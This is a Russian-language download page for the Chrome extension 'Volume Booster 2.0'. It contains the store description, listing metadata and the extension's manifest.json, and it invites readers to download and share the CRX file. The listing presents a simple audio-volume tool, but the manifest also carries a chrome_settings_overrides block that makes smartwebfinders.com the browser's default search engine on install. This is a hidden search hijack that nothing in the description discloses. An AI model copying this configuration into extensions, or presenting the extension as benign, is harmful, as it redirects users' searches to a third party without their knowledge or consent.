Volume Booster 2.0

Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!

Что такое Volume Booster 2.0?

Volume Booster 2.0 - это расширение Chrome, разработанное V & G, и его основная функция - "Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!".

Снимки экрана расширения

screenshot

Скачать файл CRX расширения Volume Booster 2.0

Скачайте файлы расширений Volume Booster 2.0 в формате crx, установите расширения Chrome вручную в браузере или поделитесь файлами crx с друзьями, чтобы легко установить расширения Chrome.

Инструкции по использованию расширения

                        Don't forget to leave a 5-Star review!! That really helps us out! 🌟🌟🌟🌟🌟

Volume Booster 2.0 allows you to increase the volume passed the standard factory setting.

If you feel that your volume is not loud enough then use Volume Booster 2.0 to enhance the loudness of the audio or video that you are playing. It is simple and easy to use with a sliding bar where you can slide up & down on the volume that you want to use.

To Turn-Off: Exit out of tab and reopen a new one.

✅ Easy To Use:

1. Click on our extension logo in your extension bar
2. Open up a Youtube, Spotify, Apple Music, or any tab that produces sound
3. Slide the bar to your comfortable volume - All the way up to 600%


✅ Features:

- Increase volume on your computer inside of google chrome tabs
- Convenient & simplistic design/UI 
- Switch to any tab that plays audio with one click
- Tells you what is currently playing inside of drop-down extension

🖥 Full-Screen 🖥

- Chrome doesn’t allow you to switch to full screen mode when using any extension that processes sound, so you can always see a rectangular icon in the tab bar (to know that the audio is being processed). 
It is impossible to get around this, after all, it is a good thing that protects you. However, you can improve the situation a bit by pressing F11 (on Windows) or Ctr + Cmd + F (on Mac).



🌟 It is free to download and use! 🌟                    

Основная информация о расширении

Название Volume Booster 2.0 Volume Booster 2.0
ID ejignddmhjbhbflngofijehfekikpaba
Официальный URL https://chromewebstore.google.com/detail/volume-booster-20/ejignddmhjbhbflngofijehfekikpaba
Описание Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!
Размер файла 96.97 KB
Количество установок 3,352
Текущая Версия 0.0.2
Последнее Обновление 2023-12-17
Дата публикации 2021-11-15
Рейтинг 3.67/5 Всего 33 оценок
Разработчик V & G
Электронная почта [email protected]
Тип оплаты free
URL страницы политики конфиденциальности https://docs.google.com/document/d/1l6vCIU3QfVt4JvlYhx51r2JpJJe3duOX3B_j5BR3cVc/edit?usp=sharing
Поддерживаемые языки en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "version": "0.0.2",
    "manifest_version": 2,
    "offline_enabled": true,
    "name": "Volume Booster 2.0",
    "description": "Increase your volume with a sliding bar & boost the sound from your computer with the highest of quality!",
    "icons": {
        "30": "icons\/icon30.png",
        "64": "icons\/icon64.png",
        "96": "icons\/icon96.png",
        "128": "icons\/icon128.png",
        "156": "icons\/icon156.png",
        "196": "icons\/icon196.png",
        "256": "icons\/icon256.png",
        "512": "icons\/icon512.png"
    },
    "browser_action": {
        "default_popup": "popup.html"
    },
    "background": {
        "scripts": [
            "js\/background.js"
        ]
    },
    "permissions": [
        "tabCapture",
        "activeTab"
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=4&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    }
}